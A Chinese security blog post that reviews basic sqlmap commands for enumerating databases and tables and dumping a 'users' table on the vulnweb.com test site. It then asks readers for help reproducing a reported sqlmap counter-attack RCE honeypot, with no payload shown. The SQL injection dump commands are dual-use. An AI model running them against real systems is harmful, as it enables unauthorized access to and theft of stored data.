sqlmap的反制复现?求指点
2023-11-26 10:47:59 Author: MicroPest(查看原文) 阅读量:23 收藏

有人问:写东西咋这么快?因为我碰到的问题不会的多啊,且乐于分享。但可惜的是读书少,无法明白更多的道理。

“喜忧参半的才是人生”,这话太经典,一时高兴一时悲伤,常伴身边,董老师提炼的,这可能就是读书的力量吧。

郭老师描述给“好学生”“差学生”讲课的情景,非常得经典,非常得形象和有意思。

“线性代数”,这是每个理科生都要学习的课程,听了国科大老师的网课才知道原来正确的翻译应该是“线的代数”,是研究线的代数,而不是研究几何的,原因据说是当年那个人看不懂内容就直译了。反正我当年是云里雾里的,也不知道跟这有没有关系。

=================

进入正题,以下是个关于sqlmap的问题,没明白,求解来着。

先来复习一下,都忘光了。

一、基础命令

1)列出有关现有数据库的信息

–dbs 列出所有可用的数据库。

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

2)列出有关特定数据库中存在的表的信息

现在使用 -D 指定我们希望访问的数据库的名称,一旦我们有权访问数据库,我们就会想看看我们是否可以访问这些表。为此,我们使用 –tables 查询。在本例中,数据库名称为 acuart

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables

3)列出有关特定表的列的信息

要查看特定表的列,我们可以使用以下命令,其中我们使用 -T 指定表名,并使用 –columns 查询列名。我们将尝试访问表“users”。

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -columns

4)转储列中的数据

我们可以逐列转储列的数据,也可以将“用户”表中存在的列全部转储.

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C uname --dump all

二、sqlmap速查表

三、求解sqlmap的反制Rce?

作者的原文在这里《可恶!没想到sqlmap也背叛了脚本小子》。

大致意思就是构造一个蜜罐,他人在sql注入时触发反制,反控对方。具体方法看作者的那篇文章是21年的一个漏洞,结果如下图:

我按照作者的思路进行了复现,但没有实现,无论是现在的版本还是以前的版本。

现在发出来,请大家参与研究下,并指点我一下。


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NDcxMDQzNA==&mid=2247488034&idx=1&sn=da90d8c3d4b626cd26d5dc34c612da9a&chksm=a682c4ef91f54df96c9832917e0de6b9faf0424e8ac9c0ddbd21917f94065cd3eba1fa17150b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh